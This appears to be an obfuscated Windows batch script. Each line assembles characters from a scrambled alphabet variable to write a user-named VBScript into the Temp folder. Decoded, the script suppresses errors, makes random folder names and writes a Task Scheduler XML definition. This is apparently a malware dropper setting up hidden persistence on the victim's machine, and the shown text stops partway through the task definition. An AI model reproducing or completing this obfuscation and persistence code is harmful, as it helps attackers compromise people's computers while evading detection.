@echo off
SETLOCAL
Set  ocvdubf=
Set  ocvdubf=%ocvdubf%("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. &+/)'&__
md "%USERPROFILE%\Temp" && cls
set eytewmw=%USERNAME%.vbs
del "%USERPROFILE%\Temp\%eytewmw%" 
set uwcrnxl=%USERPROFILE%\Temp\%eytewmw% ECHO
>>%uwcrnxl%  %ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~16,1%%ocvdubf:~55,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~65,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~58,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%,%ocvdubf:~23,1%%ocvdubf:~51,1%%ocvdubf:~48,1%,%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~61,1%,%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%,%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~27,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~45,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~40,1%%ocvdubf:~52,1%%ocvdubf:~41,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%,%ocvdubf:~65,1%%ocvdubf:~50,1%%ocvdubf:~56,1%%ocvdubf:~44,1%,%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%,%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~55,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~30,1%%ocvdubf:~58,1%%ocvdubf:~39,1%%ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~43,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~64,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~43,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~30,1%%ocvdubf:~58,1%%ocvdubf:~39,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~43,1%%ocvdubf:~0,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%,%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%=%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%,%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~52,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~56,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~0,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%,%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%,%ocvdubf:~40,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%=%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%,%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<?%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~56,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%=%ocvdubf:~70,1%%ocvdubf:~3,1%%ocvdubf:~64,1%%ocvdubf:~2,1%%ocvdubf:~70,1%%ocvdubf:~65,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~52,1%%ocvdubf:~41,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%=%ocvdubf:~70,1%%ocvdubf:~32,1%%ocvdubf:~31,1%%ocvdubf:~17,1%-%ocvdubf:~3,1%%ocvdubf:~8,1%%ocvdubf:~70,1%?>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~31,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~56,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%=%ocvdubf:~70,1%%ocvdubf:~3,1%%ocvdubf:~64,1%%ocvdubf:~4,1%%ocvdubf:~70,1%%ocvdubf:~65,1%%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~51,1%%ocvdubf:~56,1%=%ocvdubf:~70,1%%ocvdubf:~45,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%:%ocvdubf:~68,1%%ocvdubf:~68,1%%ocvdubf:~56,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~64,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~43,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~40,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~68,1%%ocvdubf:~60,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~56,1%%ocvdubf:~68,1%%ocvdubf:~4,1%%ocvdubf:~2,1%%ocvdubf:~2,1%%ocvdubf:~6,1%%ocvdubf:~68,1%%ocvdubf:~2,1%%ocvdubf:~4,1%%ocvdubf:~68,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~68,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%%ocvdubf:~70,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~43,1%%ocvdubf:~52,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~43,1%%ocvdubf:~52,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~56,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~23,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~20,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%%ocvdubf:~67,1%%ocvdubf:~1,1%\%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~1,1%<%ocvdubf:~68,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~20,1%%ocvdubf:~41,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~23,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~44,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
